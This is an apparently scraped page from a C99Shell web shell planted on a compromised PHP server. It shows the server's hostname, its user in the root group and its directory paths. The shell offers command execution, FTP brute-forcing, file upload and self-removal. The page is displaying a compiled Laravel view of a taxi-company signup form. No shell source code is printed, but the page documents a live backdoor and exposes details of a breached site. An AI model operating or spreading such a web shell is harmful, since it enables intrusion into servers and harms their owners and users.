!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/wataxi.picotech.app/public_html/storage/framework/views/   drwxrwsr-t
Free 29.28 GB of 117.98 GB (24.82%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     bb6f8baa8aff2e05f256c7b69b2cdea78c492dc3.php (7.2 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

<!-- Section 1 -->
<section class="relative w-full bg-center bg-cover" style="background-image:url('/taxi/bg.jpeg')">

    <div class="absolute inset-0 bg-gradient-to-br from-blue-900 via-blue-700 to-blue-400 opacity-90"></div>

    <div class="mx-auto max-w-7xl">

        <div class="relative flex items-center justify-between h-24 px-10">
            <a href="/" class="flex items-center mb-4 font-medium text-gray-100 lg:order-none lg:w-auto lg:items-center lg:justify-center md:mb-0">
                <span class="text-2xl font-black leading-none text-gray-100 select-none logo"><?php echo e(strtolower(config('global.site_name','FindMeTaxi'))); ?></span>
            </a>

            <a href="/" class="relative text-lg font-medium tracking-wide text-blue-100 transition duration-150 ease-out hover:text-white" x-data="{ hover: false }" @mouseenter="hover = true" @mouseleave="hover = false">
                <span class="block"><?php echo e(__('taxi.home')); ?></span>
                <span class="absolute bottom-0 left-0 inline-block w-full h-1 -mb-1 overflow-hidden">
                    <span x-show="hover" class="absolute inset-0 inline-block w-full h-1 h-full transform border-t-2 border-blue-300" x-transition:enter="transition ease-out duration-150" x-transition:enter-start="scale-0" x-transition:enter-end="scale-100" x-transition:leave="transition ease-out duration-300" x-transition:leave-start="scale-100" x-transition:leave-end="scale-0" style="display: none;"></span>
                </span>
            </a>

        </div>

        <div class="flex flex-col items-center px-10 pt-20 pb-40 lg:flex-row">
            <div class="relative w-full max-w-2xl bg-cover lg:w-7/12">
                <div class="relative flex flex-col items-center justify-center w-full h-full lg:pr-10">
                    <div class="flex flex-col items-start space-y-8">
                        <div class="relative">
                            <h1 class="text-5xl font-extrabold leading-tight text-gray-100 sm:text-7xl md:text-8xl"><?php echo e(__('taxi.sign_up_drivers_slogan')); ?></h1>
                        </div>
                        <p class="text-2xl text-blue-300"><?php echo e(__('taxi.sign_up_drivers_slogan_description')); ?></p>
                        <p class="text-s text-blue-200 font-medium opacity-90"><a href="#pricing" class="mr-1 underline"><?php echo e(__('taxi.view_pricing')); ?></a> | <a href="#faq" class="mr-1 underline"><?php echo e(__('taxi.fr_as_qu')); ?></a> </p>
                    </div>
                </div>
            </div>

            <div class="relative z-10 w-full max-w-2xl mt-20 lg:mt-0 lg:w-5/12">
                <div class="flex flex-col items-start justify-start p-10 bg-white shadow-2xl rounded-xl">
                    <h4 class="w-full text-3xl font-bold"><?php echo e(__('taxi.signup')); ?></h4>
                    <?php if(session('status')): ?>
                                <div class="alert alert-success alert-dismissible fade show" role="alert">
                                    <?php echo e(session('status')); ?>

                                    <button type="button" class="close" data-dismiss="alert" aria-label="Close">
                                        <span aria-hidden="true">&times;</span>
                                    </button>
                                </div>
                    <?php endif; ?>
                    <div class="relative w-full mt-6 space-y-8">
                        <form  id="registerform" method="post" action="<?php echo e(route('newrestaurant.store')); ?>" autocomplete="off">
                            <?php echo csrf_field(); ?>
                            <div class="relative py-3">
                                <label class="font-medium text-gray-900"><?php echo e(__('taxi.company_or_brand_name')); ?></label>
                                <input value="<?php echo e(old('name')?old('name'):''); ?>" name="name" id="name" type="text" class="block w-full px-4 py-4 mt-2 text-xl placeholder-gray-400 bg-gray-100 rounded-lg focus:outline-none focus:ring-4 focus:ring-blue-600 focus:ring-opacity-50" >
                                <?php if($errors->has('name')): ?>
                                    <p class="text-xs text-red-900 mt-2 font-medium opacity-90"><?php echo e($errors->first('name')); ?></p>
                                <?php endif; ?>
                            </div>
                            <div class="relative py-3">
                                <label class="font-medium text-gray-900"><?php echo e(__('taxi.personal_name')); ?></label>
                                <input value="<?php echo e(old('name_owner')?old('name_owner'):''); ?>" name="name_owner" id="name_owner" type="text" class="block w-full px-4 py-4 mt-2 text-xl placeholder-gray-400 bg-gray-100 rounded-lg focus:outline-none focus:ring-4 focus:ring-blue-600 focus:ring-opacity-50" >
                                <?php if($errors->has('name_owner')): ?>
                                    <p class="text-xs text-red-900 mt-2 font-medium opacity-90"><?php echo e($errors->first('name_owner')); ?></p>
                                <?php endif; ?>
                            </div>
                            <div class="relative py-3">
                                <label class="font-medium text-gray-900"><?php echo e(__('Email Address')); ?></label>
                                <input value="<?php echo e(old('email_owner')?old('email_owner'):''); ?>" name="email_owner" id="email_owner" type="email" class="block w-full px-4 py-4 mt-2 text-xl placeholder-gray-400 bg-gray-100 rounded-lg focus:outline-none focus:ring-4 focus:ring-blue-600 focus:ring-opacity-50">
                                <?php if($errors->has('email_owner')): ?>
                                    <p class="text-xs text-red-900 mt-2 font-medium opacity-90"><?php echo e($errors->first('email_owner')); ?></p>
                                <?php endif; ?>
                            </div>
                            <div class="relative py-3">
                                <label class="font-medium text-gray-900"><?php echo e(__('Phone')); ?></label><br />
                                <input name="phone_owner" id="phone_owner" type="text" class="block w-full px-4 py-4 mt-2 text-xl placeholder-gray-400 bg-gray-100 rounded-lg focus:outline-none focus:ring-4 focus:ring-blue-600 focus:ring-opacity-50">
                                <?php if($errors->has('phone_owner')): ?>
                                    <p class="text-xs text-red-900 mt-2 font-medium opacity-90"><?php echo e($errors->first('phone_owner')); ?></p>
                                <?php endif; ?>
                            </div>
                            <div class="relative py-3">
                               <button type="submit" class="inline-block w-full px-5 py-4 text-lg font-medium text-center text-dark transition duration-200 bg-blue-600 rounded-lg hover:bg-blue-700 ease"><?php echo e(__('Create account')); ?></button>
                            </div>
                        </form>
                    </div>
                </div>

            </div>
        </div>
    </div>

</section>
<?php /**PATH /home/picotech/domains/wataxi.picotech.app/public_html/resources/views/taxilanding/onboard/header.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0053 ]--